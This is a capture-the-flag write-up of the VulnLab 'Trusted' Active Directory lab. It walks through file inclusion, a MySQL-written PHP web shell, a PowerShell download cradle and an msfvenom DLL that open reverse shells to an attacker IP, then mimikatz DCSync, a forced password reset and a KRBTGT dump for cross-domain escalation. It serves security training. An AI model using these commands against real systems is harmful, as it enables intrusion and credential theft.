Post

VulnLab Trusted

VulnLab Trusted

VulnLab Trusted

Trusted

Recon

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
└─$ rustscan -a 10.10.195.213,10.10.195.214 -r 1-65535
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned ports so fast, even my computer was surprised.

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 65435'.
<SNIP>
Nmap scan report for 10.10.195.214
Host is up, received echo-reply ttl 127 (0.095s latency).
Scanned at 2024-12-15 18:36:41 +05 for 0s

PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
80/tcp    open  http             syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
443/tcp   open  https            syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
3306/tcp  open  mysql            syn-ack ttl 127
3389/tcp  open  ms-wbt-server    syn-ack ttl 127
5985/tcp  open  wsman            syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
47001/tcp open  winrm            syn-ack ttl 127
49664/tcp open  unknown          syn-ack ttl 127
49665/tcp open  unknown          syn-ack ttl 127
49666/tcp open  unknown          syn-ack ttl 127
49667/tcp open  unknown          syn-ack ttl 127
49669/tcp open  unknown          syn-ack ttl 127
49672/tcp open  unknown          syn-ack ttl 127
49677/tcp open  unknown          syn-ack ttl 127
49678/tcp open  unknown          syn-ack ttl 127
49689/tcp open  unknown          syn-ack ttl 127
57952/tcp open  unknown          syn-ack ttl 127
60400/tcp open  unknown          syn-ack ttl 127
65435/tcp open  unknown          syn-ack ttl 127

<SNIP>
Nmap scan report for 10.10.195.213
Host is up, received echo-reply ttl 127 (0.091s latency).
Scanned at 2024-12-15 18:36:41 +05 for 1s

PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
3389/tcp  open  ms-wbt-server    syn-ack ttl 127
5985/tcp  open  wsman            syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
47001/tcp open  winrm            syn-ack ttl 127
49201/tcp open  unknown          syn-ack ttl 127
49664/tcp open  unknown          syn-ack ttl 127
49665/tcp open  unknown          syn-ack ttl 127
49666/tcp open  unknown          syn-ack ttl 127
49667/tcp open  unknown          syn-ack ttl 127
49669/tcp open  unknown          syn-ack ttl 127
49670/tcp open  unknown          syn-ack ttl 127
49673/tcp open  unknown          syn-ack ttl 127
49678/tcp open  unknown          syn-ack ttl 127
49679/tcp open  unknown          syn-ack ttl 127
49690/tcp open  unknown          syn-ack ttl 127
52811/tcp open  unknown          syn-ack ttl 127
53155/tcp open  unknown          syn-ack ttl 127

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.51 seconds
           Raw packets sent: 32 (1.384KB) | Rcvd: 29 (1.260KB)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
└─$ nmap -sC -sV -p53,88,135,139,389,445,464,593,636,3269,3268,3389,5985,9389,47001,49201,49665,49667,49666,49664,49669,49670,49673,49678,49679,49690,52811,53155 10.10.195.213
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-15 18:38 +05
Nmap scan report for 10.10.195.213
Host is up (0.10s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-15 13:37:19Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=trusteddc.trusted.vl
| Not valid before: 2024-12-14T13:27:37
|_Not valid after:  2025-06-15T13:27:37
| rdp-ntlm-info: 
|   Target_Name: TRUSTED
|   NetBIOS_Domain_Name: TRUSTED
|   NetBIOS_Computer_Name: TRUSTEDDC
|   DNS_Domain_Name: trusted.vl
|   DNS_Computer_Name: trusteddc.trusted.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-12-15T13:38:15+00:00
|_ssl-date: 2024-12-15T13:38:23+00:00; -1m16s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49201/tcp open  msrpc         Microsoft Windows RPC
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49679/tcp open  msrpc         Microsoft Windows RPC
49690/tcp open  msrpc         Microsoft Windows RPC
52811/tcp open  msrpc         Microsoft Windows RPC
53155/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: TRUSTEDDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-12-15T13:38:16
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: -1m16s, deviation: 0s, median: -1m17s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.76 seconds

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
└─$ nmap -sC -sV -p53,80,88,135,139,389,445,443,464,593,636,3268,3269,3306,3389,5985,9389,49664,49666,49665,49667,49669,49672,49677,49678,49689,47001,57952,60400,65435 10.10.195.214
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-15 18:38 +05
Nmap scan report for 10.10.195.214
Host is up (0.091s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
| http-title: Welcome to XAMPP
|_Requested resource was http://10.10.195.214/dashboard/
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-15 13:37:20Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http      Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
| http-title: Welcome to XAMPP
|_Requested resource was https://10.10.195.214/dashboard/
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3306/tcp  open  mysql         MySQL 5.5.5-10.4.24-MariaDB
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.4.24-MariaDB
|   Thread ID: 11
|   Capabilities flags: 63486
|   Some Capabilities: Speaks41ProtocolOld, Speaks41ProtocolNew, SupportsCompression, InteractiveClient, FoundRows, Support41Auth, DontAllowDatabaseTableColumn, SupportsTransactions, IgnoreSigpipes, ODBCClient, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, LongColumnFlag, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: nn`tIP3MjP2GO9k2S//>
|_  Auth Plugin Name: mysql_native_password
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=labdc.lab.trusted.vl
| Not valid before: 2024-12-14T13:27:35
|_Not valid after:  2025-06-15T13:27:35
|_ssl-date: 2024-12-15T13:38:24+00:00; -1m17s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: LAB
|   NetBIOS_Domain_Name: LAB
|   NetBIOS_Computer_Name: LABDC
|   DNS_Domain_Name: lab.trusted.vl
|   DNS_Computer_Name: labdc.lab.trusted.vl
|   DNS_Tree_Name: trusted.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-12-15T13:38:18+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  msrpc         Microsoft Windows RPC
57952/tcp open  msrpc         Microsoft Windows RPC
60400/tcp open  msrpc         Microsoft Windows RPC
65435/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: LABDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-12-15T13:38:18
|_  start_date: N/A
|_clock-skew: mean: -1m17s, deviation: 0s, median: -1m17s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.01 seconds

labdc.lab.trusted.vl

We have web site running on port 80/443

Fuzzing the directories reslts in interesting endpoint /dev

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
└─$ gobuster dir -u http://10.10.195.214 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.195.214
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 336] [--> http://10.10.195.214/img/]
/dev                  (Status: 301) [Size: 336] [--> http://10.10.195.214/dev/]
/examples             (Status: 503) [Size: 402]
/licenses             (Status: 403) [Size: 421]
/dashboard            (Status: 301) [Size: 342] [--> http://10.10.195.214/dashboard/]

Each page seems to involve /dev/index.html?view=, where view paramater contains file. Potential LFI/RFI vulnerability

We also find note in home page

Let’s test for LFI/RFI vulnerability. Sending \WINDOWS\system32\drivers\etc\hosts works, resulting in LFI

Since we know that it’s php based on note and default home page we saw on /dashboard endpoint, let’s try reading source code. But before that we need to fuzz for filenames

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
└─$ ffuf -u "http://10.10.195.214/dev/index.html?view=FUZZ.php" -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -fw 58

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.195.214/dev/index.html?view=FUZZ.php
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 58
________________________________________________

db                      [Status: 200, Size: 763, Words: 26, Lines: 31, Duration: 96ms]
system                  [Status: 200, Size: 892, Words: 47, Lines: 32, Duration: 182ms]
pear                    [Status: 200, Size: 741, Words: 25, Lines: 31, Duration: 104ms]
table                   [Status: 200, Size: 1185, Words: 67, Lines: 38, Duration: 114ms]
con                     [Status: 200, Size: 1079, Words: 56, Lines: 35, Duration: 96ms]

We saw a note regarding database connection, let’s try reading db.php. We have to use php://filter to read it, thus we need to send php://filter/read=convert.base64-encode/resource=db.php as view parameter

Decode it

1
2
3
4
5
6
7
8
9
10
11
12
13
└─$ echo "PD9waHAgDQokc2VydmVybmFtZSA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIlN1cGVyU2VjdXJlTXlTUUxQYXNzdzByZDEzMzcuIjsNCg0KJGNvbm4gPSBteXNxbGlfY29ubmVjdCgkc2VydmVybmFtZSwgJHVzZXJuYW1lLCAkcGFzc3dvcmQpOw0KDQppZiAoISRjb25uKSB7DQogIGRpZSgiQ29ubmVjdGlvbiBmYWlsZWQ6ICIgLiBteXNxbGlfY29ubmVjdF9lcnJvcigpKTsNCn0NCmVjaG8gIkNvbm5lY3RlZCBzdWNjZXNzZnVsbHkiOw0KPz4=" | base64 -d
<?php 
$servername = "localhost";
$username = "root";
$password = "<REDACTED>";

$conn = mysqli_connect($servername, $username, $password);

if (!$conn) {
  die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
?> 

We saw port 3306 open, let’s connect and enumerate database. We find news database with users table containing hashes

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
└─$ mysql -h 10.10.195.214 -u 'root' -p --skip-ssl
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 23
Server version: 10.4.24-MariaDB mariadb.org binary distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| news               |
| performance_schema |
| phpmyadmin         |
| test               |
+--------------------+
6 rows in set (0.103 sec)

MariaDB [(none)]> use news;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [news]> show tables;
+----------------+
| Tables_in_news |
+----------------+
| users          |
+----------------+
1 row in set (0.090 sec)

MariaDB [news]> select * from users;
+----+------------+--------------+-----------+------------+
| id | first_name | short_handle | last_name | password   |
+----+------------+--------------+-----------+------------+
|  1 | Robert     | rsmith       | Smith     | <REDACTED> |
|  2 | Eric       | ewalters     | Walters   | <REDACTED> |
|  3 | Christine  | cpowers      | Powers    | <REDACTED> |
+----+------------+--------------+-----------+------------+
3 rows in set (0.101 sec)

Let’s crack them

1
2
3
4
5
└─$ hashcat -m 0 hashes /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting
<SNIP>
<REDACTED>:<REDACTED>    
<SNIP>

Path 1

Moreover, it seems that we have file write privileges. If secure_file_priv is empty, it means we have both read and write privileges.

1
2
3
4
5
6
7
8
MariaDB [news]> show variables like "secure_file_priv";  
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv |       |
+------------------+-------+
1 row in set (0.099 sec)

So we can create a webshell

1
2
MariaDB [news]> select '<?php system($_REQUEST["cmd"]); ?>' into outfile "C:\\xampp\\htdocs\\dev\\shell.php";
Query OK, 1 row affected (0.102 sec)

And we got system shell

Let’s get reverse shell

1
└─$ wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
1
└─$ echo "Invoke-PowerShellTcp -Reverse -IPAddress 10.8.4.147 -Port 6666" >> Invoke-PowerShellTcp.ps1
1
2
└─$ echo "IEX (New-Object Net.webclient).downloadString('http://10.8.4.147/Invoke-PowerShellTcp.ps1')" | iconv -t utf-16le | base64 -w 0; echo
SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AOAAuADQALgAxADQANwAvAEkAbgB2AG8AawBlAC0AUABvAHcAZQByAFMAaABlAGwAbABUAGMAcAAuAHAAcwAxACcAKQAKAA==
1
└─$ curl -s 'http://10.10.195.214/dev/shell.php?cmd=powershell+-ep+bypass+-w+hidden+-enc+SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AOAAuADQALgAxADQANwAvAEkAbgB2AG8AawBlAC0AUABvAHcAZQByAFMAaABlAGwAbABUAGMAcAAuAHAAcwAxACcAKQAKAA=='

And we got shell

We can use mimikatz or LaZagne to dump the hashes

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
PS C:\programdata\mimikatz\x64> .\mimikatz.exe "lsadump::dcsync /domain:lab.trusted.vl /user:LAB\Administrator" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /domain:lab.trusted.vl /user:LAB\Administrator
[DC] 'lab.trusted.vl' will be the domain
[DC] 'labdc.lab.trusted.vl' will be the DC server
[DC] 'LAB\Administrator' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   : 1/1/1601 12:00:00 AM
Password last change : 9/14/2022 3:07:20 PM
Object Security ID   : S-1-5-21-2241985869-2159962460-1278545866-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: <REDACTED>

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : ad401ca4d91e44c23f2660d1fbf9cc32

* Primary:Kerberos-Newer-Keys *
    Default Salt : EC2AMAZ-J9QE7NIAdministrator
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : ef0dd1293ef26fdcb054dfecd324e272037f8af708bd2d6289d4010075605eb3
      aes128_hmac       (4096) : 8487e135528f40d60c99a45b071bbf86
      des_cbc_md5       (4096) : b64aef752657b3c8
    OldCredentials
      aes256_hmac       (4096) : e5f4c80cec03d5bacbcda19213807a5380e5e640eb7a18b0bd3b2183dd12b540
      aes128_hmac       (4096) : 3efe2e093f36073588d7ff5816a6668d
      des_cbc_md5       (4096) : b3752676855de351
    OlderCredentials
      aes256_hmac       (4096) : 747c8d353e4a940bd9dda531201dd0ca41d0fbb5c991fd78e3f7fd95682b8363
      aes128_hmac       (4096) : 063ea1d534b134e91b9497516215ff7c
      des_cbc_md5       (4096) : 01c77334ab7c6d0d

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos *
    Default Salt : EC2AMAZ-J9QE7NIAdministrator
    Credentials
      des_cbc_md5       : b64aef752657b3c8
    OldCredentials
      des_cbc_md5       : b3752676855de351


mimikatz(commandline) # exit
Bye!

We got admin hash

1
2
3
4
└─$ nxc smb 10.10.195.214 -u administrator -H '<REDACTED>'    
SMB         10.10.195.214   445    LABDC            [*] Windows Server 2022 Build 20348 x64 (name:LABDC) (domain:lab.trusted.vl) (signing:True) (SMBv1:False)
SMB         10.10.195.214   445    LABDC            [+] lab.trusted.vl\administrator:<REDACTED> (Pwn3d!)

Path 2

There’s also another way to pwn the domain. After cracking the hashes from DB, we can run bloodhound to retrieve domain topology

1
2
3
└─$ nxc smb 10.10.195.214  -u 'rsmith' -p '<REDACTED>'
SMB         10.10.195.214   445    LABDC            [*] Windows Server 2022 Build 20348 x64 (name:LABDC) (domain:lab.trusted.vl) (signing:True) (SMBv1:False)
SMB         10.10.195.214   445    LABDC            [+] lab.trusted.vl\rsmith:<REDACTED> 

Let’s run bloodhound. There was some issue with bloodhound, which can be resolved by dnschef

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
└─$ dnschef --fakeip 10.10.195.214
/usr/bin/dnschef:453: SyntaxWarning: invalid escape sequence '\/'
  header += "      / _` | '_ \/ __|/ __| '_ \ / _ \  _|\n"
/usr/bin/dnschef:454: SyntaxWarning: invalid escape sequence '\_'
  header += "     | (_| | | | \__ \ (__| | | |  __/ |  \n"
/usr/bin/dnschef:455: SyntaxWarning: invalid escape sequence '\_'
  header += "      \__,_|_| |_|___/\___|_| |_|\___|_|  \n"
          _                _          __  
         | | version 0.4  | |        / _| 
       __| |_ __  ___  ___| |__   ___| |_ 
      / _` | '_ \/ __|/ __| '_ \ / _ \  _|
     | (_| | | | \__ \ (__| | | |  __/ |  
      \__,_|_| |_|___/\___|_| |_|\___|_|  
                   iphelix@thesprawl.org  

(21:10:45) [*] DNSChef started on interface: 127.0.0.1
(21:10:45) [*] Using the following nameservers: 8.8.8.8
(21:10:45) [*] Cooking all A replies to point to 10.10.195.214

1
2
3
4
5
6
└─$ bloodhound-python -d lab.trusted.vl -u rsmith -p '<REDACTED>' -ns 127.0.0.1 -c all --zip -dc labdc.lab.trusted.vl
WARNING: Could not find a global catalog server, assuming the primary DC has this role
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc
INFO: Getting TGT for user
<SNIP>

In bloodhound we see that rsmith can change ewalters’ password, who is member of Remote Management Users and Remote Desktop Users group

Let’s change the password

1
2
3
4
5
6
7
8
└─$ impacket-changepasswd lab/ewalters@labdc.lab.trusted.vl -newpass 'P@ssw0rd!' -altuser rsmith -altpass '<REDACTED>' -reset
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Setting the password of lab\ewalters as lab\rsmith
[*] Connecting to DCE/RPC as lab\rsmith
[*] Password was changed successfully.
[!] User no longer has valid AES keys for Kerberos, until they change their password again.

1
2
3
└─$ nxc smb 10.10.195.214 -u ewalters -p 'P@ssw0rd!'               
SMB         10.10.195.214   445    LABDC            [*] Windows Server 2022 Build 20348 x64 (name:LABDC) (domain:lab.trusted.vl) (signing:True) (SMBv1:False)
SMB         10.10.195.214   445    LABDC            [+] lab.trusted.vl\ewalters:P@ssw0rd! 

Now we can connect as ewalters via winrm

1
2
3
4
5
6
7
8
9
10
11
└─$ evil-winrm -i 10.10.195.214 -u ewalters -p 'P@ssw0rd!'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ewalters\Documents> 

There’s a AVTest directory in C:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
*Evil-WinRM* PS C:\> ls


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         9/14/2022   7:03 PM                AVTest
d-----         8/19/2021   6:24 AM                EFI
d-----          5/8/2021   8:20 AM                PerfLogs
d-r---         9/19/2022   3:46 PM                Program Files
d-----         8/10/2022   4:06 AM                Program Files (x86)
d-r---         9/18/2022   9:07 PM                Users
d-----         5/27/2023   4:12 PM                Windows
d-----         9/14/2022   6:07 PM                xampp


*Evil-WinRM* PS C:\> cd AVTest
*Evil-WinRM* PS C:\AVTest> ls


    Directory: C:\AVTest


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         9/14/2022   4:46 PM        4870584 KasperskyRemovalTool.exe
-a----         9/14/2022   7:05 PM            235 readme.txt


*Evil-WinRM* PS C:\AVTest> type readme.txt
Since none of the AV Tools we tried here in the lab satisfied our needs it's time to clean them up.
I asked Christine to run them a few times, just to be sure.

Let's just hope we don't have to set this lab up again because of this.

Assuming that it has to be run few times, there can be some scheduled task that runs it. We can download the binary and analyze it by using Procmon, we see that binary can’t find KasperskyRemovalToolENU.dll. Thus it is possible to perform DLL Hijacking attack.

We can create one with msfvenom

1
2
3
4
5
6
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.8.4.147 LPORT=6666 -f dll > KasperskyRemovalToolENU.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 9216 bytes

Upload it to directory

1
2
3
*Evil-WinRM* PS C:\AVTest> iwr http://10.8.4.147/KasperskyRemovalToolENU.dll -outfile KasperskyRemovalToolENU.dll
*Evil-WinRM* PS C:\AVTest> 

After few seconds we get our shell as cpowers

trusteddc.trusted.vl

Since we have administrative control over child domain, we can perform ExtraSids Attack. The things we need to perform the attack:

  • The KRBTGT hash for the child domain
  • The SID for the child domain
  • The name of a target user in the child domain (Any domain user)
  • The FQDN of the child domain.
  • The SID of the Enterprise Admins group of the root domain. The attack can be performed from both windows and linux. We will do it from linux.

Let’s dump KRBTGT hash for the child domain

1
2
3
4
5
6
7
8
9
10
11
└─$ secretsdump.py LAB/Administrator:@10.10.195.214 -just-dc-user LAB/krbtgt -hashes ':<REDACTED>'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:c930ddb15c3f84aafa01e816abc1112e38430b574ae3fcdd019e77bc906494aa
